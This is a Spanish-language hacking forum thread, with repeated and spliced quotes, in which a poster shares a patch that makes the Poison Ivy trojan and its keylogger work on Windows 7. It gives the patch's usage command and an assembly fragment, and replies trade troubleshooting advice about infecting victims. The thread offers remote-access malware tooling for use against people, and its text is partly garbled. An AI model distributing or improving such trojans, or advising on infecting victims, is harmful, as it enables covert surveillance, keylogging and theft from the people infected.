[Enlace externo eliminado para invitados] ... ormat=html
Bien. A este post lo traje de un foro el cual modero. Aca les dejo el link:
Fue posteado por un Moderador Global, Y fue analizado.
El archivo dwwin.exe que dice el anubis es una aplicación incluida en windows xp llamda Microsoft Doctor Watson, esta aplicación solo se encarga de recopilar información acerca de los errores de windows y enviar informes de error.
Aca una imagen de como se usa
ANTRAX
Código: Seleccionar todo
http://hackhound.org/forum/index.php?topic=38980.0El archivo dwwin.exe que dice el anubis es una aplicación incluida en windows xp llamda Microsoft Doctor Watson, esta aplicación solo se encarga de recopilar información acerca de los errores de windows y enviar informes de error.
Aca una imagen de como se usa
ANTRAX
para que funcione infectando ah un windows seven el cleinte corre perfecto en todos los so
J46 escribió:perdonad pero tengo una duda.. este patch que es para poder utilizar poison con windows 7 ? o para q funcione infectando una victima con w7 ?
Una pregunta. El parches es que funcione en Windows 7 y para que también levante información el keylogger? Porque de ser así quizás funcione el keylogger también en vista.
Si, es asi como decis. Es para que funcione el keylogger en 7Ignaro mayor de BsAS escribió:Una pregunta. El parches es que funcione en Windows 7 y para que también levante información el keylogger? Porque de ser así quizás funcione el keylogger también en vista.
Hola, se me dio por probar pi en win7 y no me funciona, alguien sabe porque puede ser?
saludos
saludos
No te funciona el troyano o no te funciona el keylogger?
Bro si te pudieras hacer un video tutorial se agradeceria muchoANTRAX escribió:
Mirando por ahi encontre esto. Es un parche para Poison Ivy 2.3.2 para que funcione y sea compatible con Windows 7.
espero que les sea de su agrado
ANTRAXThis patch the Poison ivy server for run in windows 7 :P
Use:
PATCHPI.exe -f %s
[Enlace externo eliminado para invitados]
By SecMAMCódigo: Seleccionar todo
/*400274*/ XOR BYTE PTR DS:[EAX],AL /*400276*/ ADD BYTE PTR DS:[EAX],AL /*400278*/ MOV ESI,DWORD PTR DS:[ESI+C] /*40027B*/ MOV ESI,DWORD PTR DS:[ESI+1C] /*40027E*/ MOV EDX,DWORD PTR DS:[ESI+8] /*400281*/ MOV EDI,DWORD PTR DS:[ESI+20] /*400284*/ MOV ESI,DWORD PTR DS:[ESI] /*400286*/ CMP DWORD PTR DS:[EDI+C],320033 /*40028D*/ JNZ SHORT LOCALHOS.0040027E /*40028F*/ MOV DWORD PTR SS:[EBP-4C1],EDX /*400295*/ RETN
thnks Hacker_Zero
y asi te evitarias tantas preguntas de users
saludos y exelente aporte
Me eh quedado abrumado :) chido eh
Exelente
Muchas gracias por el aporte
Muchas gracias por el aporte
-Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas.
-Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro.
-Los grandes espíritus siempre han encontrado una violenta oposición de parte de mentes mediocres.
-Cada día sabemos más y entendemos menos.
Albert Einstein
-Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro.
-Los grandes espíritus siempre han encontrado una violenta oposición de parte de mentes mediocres.
-Cada día sabemos más y entendemos menos.
Albert Einstein
ANTRAX escribió:No te funciona el troyano o no te funciona el keylogger?
el troyano!
this patch not work 64 bit win7 ,,and work 32 bit win7 but not connected restart server because poison not support hklm run users in ?nstall server part in rat........:(
one munite !!!!!!
El troyano en si, si conecta en vista y en seven, solo que funciona mal. y con este parche lo haces funcional. Revisa bien las configuraciones que has puestoluchy78ar escribió:ANTRAX escribió:No te funciona el troyano o no te funciona el keylogger?
el troyano!
gracias antrax por el aporte lo probare aver que tal saludos y gracias
Abolición para el torneo del toro de la vega. Death to the murderers of bulls.
